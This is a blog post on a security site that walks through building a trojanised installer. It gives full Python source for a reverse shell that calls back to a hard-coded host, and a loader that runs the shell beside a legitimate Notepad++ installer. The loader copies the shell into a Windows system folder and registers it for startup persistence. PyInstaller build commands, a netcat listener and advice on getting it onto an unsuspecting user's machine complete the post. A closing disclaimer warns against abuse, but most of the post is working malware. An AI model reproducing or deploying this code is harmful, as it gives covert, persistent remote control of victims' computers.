avatar
oxasploits
one zero day at a time
  • HOME
  • SERVICES
  • CATEGORIES
  • ARCHIVES
  • WORDLISTS
  • EXPLOITS
  • UPTIME
  • PRIVACY
  • ABOUT
  • PREVIOUS ENEAVORS
Home Backdoors embedded along side installers
Post
Large Logo

Backdoors embedded along side installers

By Marshall Whittaker
Posted Dec 16, 2022 3 min read
backdoor shell shellcode reverse-shell installer embedded embedding binaries persistence
If you enjoy my work, please donate! I work hard keeping oxasploits running!
Bitcoin Donation Address:
3Ht1soLAdcBXrxbZLDJ53vry819E3rw49d
You can also sponsor me on GitHub!
Thank you so much and happy hacking!

rev shell

What is PyInstaller and why do we need it?

PyInstaller is basically a binary that includes bundled within: python, your python dependancies, your python scripts, as well as any other binaries (.exe or .dll) that you would like to include. You may also link in an icon resource on build. Why do I use PyInstaller? Because it’s commonly enough used that it won’t be flagged itself as a virus or as malware, but I can still pack inside malicious code.

What malicious code

A legitamite installer or program can be any piece of compiled code (al la: into an .exe) that is not related to this project’s code can be imported in and executed at the same time my reverse shell starts. The malicious code does it’s business in the background, forking off as another process and copying itself to a new loocation, while the user is using the installer or program as normal, with no knowlwdge of the backdoor that is about to pop back through the firewall connecting “outbound” towards a netcat lisener. While this is happening, a registry key is created which enters our reverse shell into the system’s Administrator level startup chain. It’s easy to spot if you know what you are looking for, but genearlly, this will be persistent long enough that you can allot yourself a couple mistakes and still have access to the machine (not get locked out). If you happen to get disconnected, kill then restart the netcat listener per: nc -l -p 7777 -v (change the port as necessary), and within a couple seconds the reverse shell loops back aroun and fires off another connection request towardsd your listener with another Administrator shell.

The shell’s code

This isn’t particularly interesting shellcode, howver it is handy. I recommend editing it to your use case in Notepad++ because things like the attacker host and port are hard coded.

import os
import socket
import subprocess
import time
import sys

host = '01.dev.oxasploits.com'
port = 7887

def shell():
    s = socket.socket
(socket.AF_INET
, socket.SOCK_STREAM)
    s.connect((host
, port))
    s.send(str
.encode("[*] Connect back from vicitim!
\n"))
    s.send(str
.encode(os.
getlogin() + "\n\n
"))
    while 1:
        try:       
            time.sleep(3)
            s.send(
str.encode(os.
getcwd() + "> "))
            data = s.
recv(1024).decode("UTF-8")
            data = data.strip('\n')
            if data == "quit": 
                break
            if data[:2] == "cd":
                os.chdir(data[3:])
            if len(data) > 0:
                proc = subprocess.
Popen(data, shell
=True, stdout=
subprocess.PIPE, stderr=subprocess.PIPE
, stdin=subprocess.PIPE) 
                stdout_value = proc.
stdout.read() +
 proc.stderr.read
()
                output_str = str(
stdout_value, "UTF-8")
                s.send(str.encode("\n" + output_str))
        except Exception as e:
             break
    s.close()

while 1:
    try:
        shell()
        sleep(15)
    except Exception as f:
        continue

The packed loader

import os
import time
import winreg
import shutil
import subprocess
from pathlib import Path

host = '01.dev.oxasploits.com'

def resource_path(relative_path
):
    base_path = getattr(sys, '_MEIPASS', os
.path.dirname(
os.path.abspath
(__file__)))
    return os.path.
join(base_path, relative_path)

def registry_start(app_name, key_data=None, 
autostart: bool = 
True) -> bool:
    with winreg.OpenKey(
            key=winreg.HKEY_CURRENT_USER,
            sub_key=r
'Software\Microsoft\Windows\CurrentVersion\Run',
            reserved=0,
            access=winreg.KEY_ALL_ACCESS,
    ) as key:
        try:
            if autostart:
                winreg.SetValueEx(
key, app_name, 0
, winreg.REG_SZ
, key_data)
            else:
                winreg.DeleteValue(
key, app_name)
        except OSError:
            return False
    return True

subprocess.Popen(
resource_path('.\shell.exe'))
subprocess.Popen(
resource_path('nppi.exe'))

pwnpath = r'C:\Windows\Tasks\taskserv.exe'

ppath = Path(pwnpath
)
if not ppath.is_file
():
        shutil.copyfile(resource_path('shell.exe'), 
pwnpath)
        registry_start('TaskServ', 
pwnpath)

Build

Then all you need to do is build the project with:

pyinstaller.exe --windowed --noconsole 
--onefile --uac-admin .\shell.py
copy dist\shell.exe .\
pyinstaller.exe --add-binary="shell.exe;." --add-binary="nppi.exe;." --icon=npp_103.ico --windowed --noconsole --onefile
 --uac-admin .\loader.py

Then run the .bat and send it on it’s way to be picked up by an unsuspecting computer user.

The End

In the end this is pretty evil code and should never be used against a target. Seriously, under any circumstances, ever. It looks benighn and totally comromises a machine while hiding it’s existance and persistently opens connections to pwn the machine.

Do. Not. Abuse. This. Code.

tools
This post is licensed under CC BY 4.0 by the author.
Share
Recently Updated
  • Chipmonk with NUT to event script power outages
  • Jekyll minification optimization
  • Bash wildcard expansion globbing abuse
  • Simple x86_64 buffer overflow in gdb
  • I Hacked a Bank and Got Arrested in 2012
Trending Tags
exploit vulnerabilities PoC code-injection config perl walkthrough 0day bitcoin blueteam


  

Further Reading

May 6, 2021

Web app exploitation techniques

Background This is intended to be a concise cheat sheet for common web application exploitation techniques. Most of these techniques are well known, but hopefully, this can serve as a place to b...

Aug 16, 2022

Chipmonk with NUT to event script power outages

Ah, shit. The power went out. So you just found the key, almost have the exploit at a PoC state where it fin… Wait what? The power went out! You just lost your last 10 minutes in between commit...

Aug 30, 2022

Jekyll minification optimization

Jekyll minify intro So as you can see, I build websites with Jekyll static site generator a lot. The problem with this is the jekyll implementation is usually used on GitHub for internal sites,...

Enumerating SUID files targeted for priv esc

Cracking Bitcoin wallet.dat passwords using John

© 2023 Marshall Whittaker. Some rights reserved.